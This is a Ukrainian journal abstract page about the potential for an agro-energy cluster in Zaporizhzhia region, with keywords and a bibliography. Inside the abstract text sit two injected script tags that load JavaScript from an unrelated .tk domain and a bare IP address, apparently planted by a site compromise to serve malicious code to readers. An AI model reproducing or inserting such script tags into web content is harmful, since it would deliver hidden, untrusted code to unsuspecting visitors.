ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.145:620.9(477.64)
Економіка агропромислового виробництва

Потенційні можливості створення агроенергетичного кластера на основі енергетичного потенціалу регіону / Воловоденко Л. В. // Економіка АПК. - 2014. - № 9 - С. 18

Розглядаються потенційні можливості створення аграрно-енергетичного кластера на підставі недостатньої регіональної пропозиції м’ясопродуктів та існуючої динаміки зменшення попиту на електроенергію, що виробляється в межах Запорізької області. Обґрунтовується економічна доцільність використання резервів електроенергії , що виробляється в області, порівнянням вартості 10 000 ккал, одержаних за допомогою теплотворної здатності традиційного палива та електроенергії. Розглядаються два можливих варіанти створення кластера з використанням зовнішнього інвестора та інвестиційного потенціалу енергогенеруючого сектора. Показано переваги останнього варіанта, що сприятиме задоволенню потреб місцевого населення і зростанню показників регіонального розвитку аграрного сектору економіки. Табл.: 1. Рис.: 3. Бібліогр.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: кластер, регіональна пропозиція, м’ясопродукти, споживання, тарифи, енергетичний баланс

Список використаних джерел

 1. Державна служба статистики України. Головне управління статистики у Запорізькій області. Економічне і соціальне становище Запорізької області за 2008–2012 роки. – Запоріжжя, 2009–2013 рр.
 2. Кропивко М.Ф. Концептуальний підхід до кластерної організації та управління розвитком аграрного виробництва / М.Ф. Кропивко // Економіка АПК. – 2011. – № 11. – C. 3–13.
 3. Одінцов М.М. Основні напрямки кластерної організації регіонального агропромислового виробництва / М.М. Одінцов, О.М. Одінцов // Економіка АПК. – 2012. – № 1. – С. 23–29.
 4. Одінцов О.М. Формування організаційно-економічного механізму аграрно-промислових кластерних систем / О.М. Одінцов // Економіка АПК. – 2012 – № 12. – С. 18–23.
 5. Податковий кодекс // Відом. Верхв. Ради України (ВВР). – 2011. – Розділ 14 (Спеціальні податкові режими).
 6. Портер М. Конкуренция / М. Портер, пер. с. англ.– М.: Вильямс, 2006. – С.154.
 7. Скрипник А.В. Регіональна ефективність використання наявних енергоресурсів в аграрному виробництві Запорізької області / А.В. Скрипник, Л.В. Воловоденко // Економіка АПК. – 2014. –№ 6. – С.3–13.
 8. Jacobs, J., 1969. The Economy of Cities. RandomHouse, New York.
 9. Maryann P. Feldman, David B. Audretsch ,Innovationin cities: Science-based diversity, specialization and localized competition European Economic Review 43 (1999) P.409–429.
 10. KetelhohnN. W. (2002) The Role of Clusters as Sources of Dynamic Externalities. DBA dissertation, HarvardUniversity.
 11. Meul, M., Nevens, F., Reheul, D.G. Energy use efficiency of specialized dairy, arable and pig farms in Flanders. Agriculture, Ecosystems&Environment. – 2007. V.119(№1-2). – P. 135.
 12. Porter M.E. The Economic Performance of Regions // RegionalStudies, Vol. 37.6&7. – August/October 2003. – Pp. 549-578.
Читати статтю: 14_09_18-24.pdf